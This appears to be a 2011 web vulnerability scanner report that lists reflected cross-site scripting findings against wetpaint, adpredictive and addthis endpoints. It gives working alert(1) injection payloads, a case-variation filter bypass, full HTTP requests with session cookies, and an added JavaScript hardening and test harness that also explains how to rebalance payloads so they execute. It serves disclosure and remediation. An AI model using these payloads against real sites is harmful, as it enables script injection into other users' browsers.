P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=0B6E0BAD75294417BE18C8FE72F24144; Path=/
Cache-Control: max-age=2592000
Expires: Mon, 07 Mar 2011 15:59:38 GMT
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 103
The requested resource (/js/pages/pagec807d<img src=a onerror=alert(1)>89bbccc59db.js) is not available
The value of the memberData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2 was submitted in the memberData parameter. This input was echoed as e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:48 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=F2E506E6F40E7272E29FB7C4E180C4EC; Path=/
Content-Length: 2310
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:48 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... ); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__-e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2); globalGaTracker._setCustomVar(4,"S ...[SNIP]...
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9b2"%3balert(1)//6628d3ad43d was submitted in the pageType parameter. This input was echoed as 6c9b2";alert(1)//6628d3ad43d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage6c9b2"%3balert(1)//6628d3ad43d&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=220715F4738F4E6735C191E62267FD6E; Path=/
Content-Length: 2236
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe633'%3balert(1)//6bf50d8f015 was submitted in the ref parameter. This input was echoed as fe633';alert(1)//6bf50d8f015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=fe633'%3balert(1)//6bf50d8f015&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=32604A57F6152A669FC5F4E4513C5645; Path=/
Content-Length: 2264
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
globalGaTracker._setReferrerOverride('fe633';alert(1)//6bf50d8f015'); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__ ...[SNIP]...
The value of the segmentProfile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6811c'%3balert(1)//93742b54adf was submitted in the segmentProfile parameter. This input was echoed as 6811c';alert(1)//93742b54adf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-106811c'%3balert(1)//93742b54adf&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:44 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=BD560CBA29D5FF2BCD7C9BBADEAE5064; Path=/
Content-Length: 2235
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:44 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
adChannelGaTracker._setReferrerOverride(''); //required since an iframe's referrer is not the same as the parent page's adChannelGaTracker._setDomainName(rootDomain); adChannel ...[SNIP]...
The value of the siteCat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f59d8'%3balert(1)//f17e3fe8edb was submitted in the siteCat parameter. This input was echoed as f59d8';alert(1)//f17e3fe8edb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technologyf59d8'%3balert(1)//f17e3fe8edb&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=FE6F1B1277DF20F3DAF73CAFC657E9B3; Path=/
Content-Length: 2269
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the siteName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c was submitted in the siteName parameter. This input was echoed as 779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions, for example by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=DA229296C73FE646FDCCE50BBF755E20; Path=/
Content-Length: 2310
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the sitesCount request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3b06f%3balert(1)//2503310a12c was submitted in the sitesCount parameter. This input was echoed as 3b06f;alert(1)//2503310a12c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=13b06f%3balert(1)//2503310a12c&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:52 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=E1FCA5C2375BFF42E571DC325636DE6B; Path=/
Content-Length: 2261
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:52 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... setCustomVar(1,"MemberData",'N__anonymous__-__-',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",13b06f;alert(1)//2503310a12c,2); globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3); globalGaTracker._setCustomVar(5,"Category",'Technology',3); globalGaTracker._trackPageview("/homePage"); } ca ...[SNIP]...
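The script-context findings above (single-quoted, double-quoted and unquoted sinks in the same inline tracking script) all come from one coding pattern: request parameters concatenated straight into a `<script>` block. The following is an added example and not code from the scanned site: a simplified stand-in for the generator of that script, a hardened version, and a small local harness that runs the generated script with stubbed `tracker` and `alert` objects to see whether the injected value actually executes. The function names, the `tracker` object and the parameter values are illustrative.

```javascript
// Added example, not the scanned application's code. Names are illustrative.

// The pattern behind the findings: request parameters concatenated into an
// inline <script>. Three sinks, three contexts: a single-quoted string, a bare
// numeric expression, and a double-quoted string.
function renderTrackerVulnerable(params) {
  return (
    "<script>" +
    "tracker._setReferrerOverride('" + params.ref + "');" +
    'tracker._setCustomVar(3,"MultiSiteVisits",' + params.sitesCount + ",2);" +
    'tracker._trackPageview("/' + params.pageType + '");' +
    "</script>"
  );
}

// Emit a value as a JavaScript string literal. JSON.stringify handles quotes,
// backslashes and control characters; the extra replacements cover what it
// leaves alone but the HTML parser still cares about: "<" (so "</script>" and
// "<!--" cannot end or comment out the block) and the U+2028/U+2029 line
// terminators that older engines treat as newlines inside a literal.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// A numeric sink is not a string: quoting cannot protect it, so validate the
// shape and emit the parsed number (or a safe default), never the raw text.
function toInt(value, fallback) {
  const s = String(value ?? "").trim();
  return /^-?\d{1,9}$/.test(s) ? Number.parseInt(s, 10) : fallback;
}

function renderTrackerHardened(params) {
  return (
    "<script>" +
    "tracker._setReferrerOverride(" + jsLiteral(params.ref ?? "") + ");" +
    'tracker._setCustomVar(3,"MultiSiteVisits",' + toInt(params.sitesCount, 1) + ",2);" +
    "tracker._trackPageview(" + jsLiteral("/" + (params.pageType ?? "")) + ");" +
    "</script>"
  );
}

// Local harness: extract the script body and run it with stub globals. It
// models the JavaScript parser only, not the HTML tokenizer (a "</script>"
// inside a string would end the element in a browser but not here), so the
// "<" escaping is checked separately with closesScriptOnce().
function scriptExecutesAlert(html) {
  const body = html.slice("<script>".length, -"</script>".length);
  let fired = false;
  const tracker = {
    _setReferrerOverride() {},
    _setCustomVar() {},
    _trackPageview() {},
  };
  try {
    new Function("tracker", "alert", body)(tracker, () => { fired = true; });
    return { fired, error: null };
  } catch (e) {
    // A SyntaxError means the input broke the script without running it:
    // the context breakout is real, but the payload needs rebalancing.
    return { fired, error: e.name };
  }
}

// Does the markup contain exactly one closing script tag, the one we emitted?
function closesScriptOnce(html) {
  return html.indexOf("</script>") === html.lastIndexOf("</script>");
}

// Walk-through with the report's own canary and a rebalanced attacker value
// (both constructed here from the payloads shown in the findings).
function demo() {
  const scannerCanary = { ref: "fe633';alert(1)//6bf50d8f015", sitesCount: "1", pageType: "homePage" };
  const rebalanced = { ref: "fe633'-alert(1)-'6bf50d8f015", sitesCount: "1", pageType: "homePage" };
  return {
    canaryVulnerable: scriptExecutesAlert(renderTrackerVulnerable(scannerCanary)),
    rebalancedVulnerable: scriptExecutesAlert(renderTrackerVulnerable(rebalanced)),
    rebalancedHardened: scriptExecutesAlert(renderTrackerHardened(rebalanced)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two things the harness makes visible. First, the scanner's canary `fe633';alert(1)//…` terminates the string but leaves the `_setReferrerOverride(` call unclosed, so in this sink it produces a syntax error rather than an alert (`error: "SyntaxError"`); that still confirms the finding, since the quote reached the script unescaped, but a retest that has to show execution needs a payload that keeps the syntax balanced, such as the `'-alert(1)-'` form, or `1);alert(1)//` for the numeric sink. Second, the hardened renderer neutralises all three contexts with one serialiser plus one integer check, which is the minimum if the values must stay in a script. The remediation text's preference is stronger: move the values out of the script context altogether by emitting them as HTML-encoded `data-*` attributes on an element and having a static script read them through `dataset`, which removes the need for `jsLiteral` entirely.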
The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 1ace3</title><script>alert(1)</script>ae207730a4d was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki1ace3</title><script>alert(1)</script>ae207730a4d&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=CE120C471FB90B16FE35CF6CDEA6164D; Path=/
Content-Length: 2257
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki1ace3</title><script>alert(1)</script>ae207730a4d</title> ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267a4"%3balert(1)//ec0110e87b was submitted in the url parameter. This input was echoed as 267a4";alert(1)//ec0110e87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F267a4"%3balert(1)//ec0110e87b HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8EF5AF1534C8D16594D2F61F4FAA440D; Path=/
Content-Length: 2235
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646be'%3balert(1)//7deaafb62b9 was submitted in the admeld_adprovider_id parameter. This input was echoed as 646be';alert(1)//7deaafb62b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492646be'%3balert(1)//7deaafb62b9&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.adpredictive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac9c7'%3balert(1)//432447c0514 was submitted in the admeld_callback parameter. This input was echoed as ac9c7';alert(1)//432447c0514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac9c7'%3balert(1)//432447c0514 HTTP/1.1
Host: um.adpredictive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92343"-alert(1)-"ebb68879ffc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php92343"-alert(1)-"ebb68879ffc HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 05 Feb 2011 15:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=if2gvf5uvdh7v1a1320leacm11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
